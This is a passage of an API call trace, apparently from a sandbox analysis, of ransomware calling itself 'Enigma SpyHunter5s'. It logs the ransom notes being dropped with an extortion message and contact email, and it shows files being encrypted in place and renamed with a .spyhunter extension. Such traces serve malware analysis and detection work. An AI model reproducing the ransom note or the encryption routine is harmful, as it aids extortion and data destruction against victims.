lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0091.821] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\system\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0091.830] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.830] WriteFile (in: hFile=0x16c, lpBuffer=0x248fd33*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fe5c, lpOverlapped=0x0 | out: lpBuffer=0x248fd33*, lpNumberOfBytesWritten=0x248fe5c*=0x127, lpOverlapped=0x0) returned 1 [0091.831] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.831] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fe5c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fe5c*=0x2ac, lpOverlapped=0x0) returned 1 [0091.832] CloseHandle (hObject=0x16c) returned 1 [0091.832] GetProcessHeap () returned 0x2c0000 [0091.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d748 | out: hHeap=0x2c0000) returned 1 [0091.832] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\system\\ado\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0091.833] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.833] WriteFile (in: hFile=0x16c, lpBuffer=0x248fd2f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fe58, lpOverlapped=0x0 | out: lpBuffer=0x248fd2f*, lpNumberOfBytesWritten=0x248fe58*=0x127, lpOverlapped=0x0) returned 1 [0091.848] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.849] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fe58, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fe58*=0x2ac, lpOverlapped=0x0) returned 1 [0091.886] CloseHandle (hObject=0x16c) returned 1 [0091.886] GetProcessHeap () returned 0x2c0000 [0091.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d5b8 | out: hHeap=0x2c0000) returned 1 [0091.886] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdf8 | out: pbBuffer=0x248fdf8) returned 1 [0091.887] GetProcessHeap () returned 0x2c0000 [0091.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x335d88 [0091.887] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x335d88*, pdwDataLen=0x248fdf0*=0x20, dwBufLen=0x30 | out: pbData=0x335d88*, pdwDataLen=0x248fdf0*=0x30) returned 1 [0091.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.896] GetProcessHeap () returned 0x2c0000 [0091.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x335d88 | out: hHeap=0x2c0000) returned 1 [0091.896] GetProcessHeap () returned 0x2c0000 [0091.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d058 | out: hHeap=0x2c0000) returned 1 [0091.896] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdf0 | out: pbBuffer=0x248fdf0) returned 1 [0091.897] GetProcessHeap () returned 0x2c0000 [0091.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0091.897] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fde8*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fde8*=0x30) returned 1 [0091.897] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0091.948] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 94 [0091.948] StrStrW (lpFirst="FPEXT.MSG", lpSrch=".txt") returned 0x0 [0091.948] GetProcessHeap () returned 0x2c0000 [0091.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0091.948] ReadFile (in: hFile=0x174, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fdac, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x248fdac*=0x2800, lpOverlapped=0x0) returned 1 [0091.977] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.977] WriteFile (in: hFile=0x174, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fdac, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x248fdac*=0x2800, lpOverlapped=0x0) returned 1 [0091.977] GetProcessHeap () returned 0x2c0000 [0091.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0091.978] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.978] WriteFile (in: hFile=0x174, lpBuffer=0x248fdec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fdac, lpOverlapped=0x0 | out: lpBuffer=0x248fdec*, lpNumberOfBytesWritten=0x248fdac*=0x4, lpOverlapped=0x0) returned 1 [0091.991] WriteFile (in: hFile=0x174, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fdac, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fdac*=0x30, lpOverlapped=0x0) returned 1 [0091.991] CloseHandle (hObject=0x174) returned 1 [0091.995] GetProcessHeap () returned 0x2c0000 [0091.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.995] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.spyhunter") returned 104 [0091.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.spyhunter")) returned 1 [0091.996] GetProcessHeap () returned 0x2c0000 [0091.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0091.996] GetProcessHeap () returned 0x2c0000 [0091.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0091.996] GetProcessHeap () returned 0x2c0000 [0091.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a750 | out: hHeap=0x2c0000) returned 1 [0091.997] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdf0 | out: pbBuffer=0x248fdf0) returned 1 [0091.997] GetProcessHeap () returned 0x2c0000 [0091.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0091.997] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248fde8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248fde8*=0x30) returned 1 [0091.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.042] GetProcessHeap () returned 0x2c0000 [0092.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.043] GetProcessHeap () returned 0x2c0000 [0092.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0092.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0092.174] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.174] WriteFile (in: hFile=0x16c, lpBuffer=0x248fd1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fe48, lpOverlapped=0x0 | out: lpBuffer=0x248fd1f*, lpNumberOfBytesWritten=0x248fe48*=0x127, lpOverlapped=0x0) returned 1 [0092.175] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.175] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fe48, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fe48*=0x2ac, lpOverlapped=0x0) returned 1 [0092.176] CloseHandle (hObject=0x16c) returned 1 [0092.191] GetProcessHeap () returned 0x2c0000 [0092.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0092.191] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fde8 | out: pbBuffer=0x248fde8) returned 1 [0092.192] GetProcessHeap () returned 0x2c0000 [0092.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.192] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fde0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fde0*=0x30) returned 1 [0092.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.192] GetProcessHeap () returned 0x2c0000 [0092.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.193] GetProcessHeap () returned 0x2c0000 [0092.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329f48 | out: hHeap=0x2c0000) returned 1 [0092.193] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fde0 | out: pbBuffer=0x248fde0) returned 1 [0092.193] GetProcessHeap () returned 0x2c0000 [0092.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.193] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdd8*=0x30) returned 1 [0092.193] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.193] GetProcessHeap () returned 0x2c0000 [0092.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.193] GetProcessHeap () returned 0x2c0000 [0092.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cd58 | out: hHeap=0x2c0000) returned 1 [0092.193] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fde0 | out: pbBuffer=0x248fde0) returned 1 [0092.193] GetProcessHeap () returned 0x2c0000 [0092.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.193] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdd8*=0x30) returned 1 [0092.193] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh" (normalized: "c:\\program files\\dvd maker\\shared\\common.fxh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.194] GetProcessHeap () returned 0x2c0000 [0092.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.194] GetProcessHeap () returned 0x2c0000 [0092.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d000 | out: hHeap=0x2c0000) returned 1 [0092.194] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdd8 | out: pbBuffer=0x248fdd8) returned 1 [0092.194] GetProcessHeap () returned 0x2c0000 [0092.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.194] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdd0*=0x30) returned 1 [0092.194] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0092.216] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll") returned 57 [0092.216] StrStrW (lpFirst="xmlrw.dll", lpSrch=".txt") returned 0x0 [0092.216] GetProcessHeap () returned 0x2c0000 [0092.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0092.216] ReadFile (in: hFile=0x17c, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fd94, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x248fd94*=0x2800, lpOverlapped=0x0) returned 1 [0092.285] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.286] WriteFile (in: hFile=0x17c, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fd94, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x248fd94*=0x2800, lpOverlapped=0x0) returned 1 [0092.286] GetProcessHeap () returned 0x2c0000 [0092.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0092.287] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.287] WriteFile (in: hFile=0x17c, lpBuffer=0x248fdd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fd94, lpOverlapped=0x0 | out: lpBuffer=0x248fdd4*, lpNumberOfBytesWritten=0x248fd94*=0x4, lpOverlapped=0x0) returned 1 [0092.307] WriteFile (in: hFile=0x17c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fd94, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fd94*=0x30, lpOverlapped=0x0) returned 1 [0092.307] CloseHandle (hObject=0x17c) returned 1 [0092.321] GetProcessHeap () returned 0x2c0000 [0092.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.322] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.spyhunter") returned 67 [0092.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.spyhunter" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll.spyhunter")) returned 1 [0092.463] GetProcessHeap () returned 0x2c0000 [0092.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.463] GetProcessHeap () returned 0x2c0000 [0092.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.463] GetProcessHeap () returned 0x2c0000 [0092.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cc98 | out: hHeap=0x2c0000) returned 1 [0092.463] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdd8 | out: pbBuffer=0x248fdd8) returned 1 [0092.463] GetProcessHeap () returned 0x2c0000 [0092.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.463] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdd0*=0x30) returned 1 [0092.463] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dvdtransform.fx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.498] GetProcessHeap () returned 0x2c0000 [0092.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.498] GetProcessHeap () returned 0x2c0000 [0092.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d8d8 | out: hHeap=0x2c0000) returned 1 [0092.498] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdd0 | out: pbBuffer=0x248fdd0) returned 1 [0092.498] GetProcessHeap () returned 0x2c0000 [0092.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.498] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdc8*=0x30) returned 1 [0092.498] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.512] GetProcessHeap () returned 0x2c0000 [0092.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.512] GetProcessHeap () returned 0x2c0000 [0092.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0092.512] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdd0 | out: pbBuffer=0x248fdd0) returned 1 [0092.512] GetProcessHeap () returned 0x2c0000 [0092.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.512] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdc8*=0x30) returned 1 [0092.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\pagecurl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.517] GetProcessHeap () returned 0x2c0000 [0092.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.517] GetProcessHeap () returned 0x2c0000 [0092.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0092.517] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdc8 | out: pbBuffer=0x248fdc8) returned 1 [0092.517] GetProcessHeap () returned 0x2c0000 [0092.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.517] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdc0*=0x30) returned 1 [0092.517] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 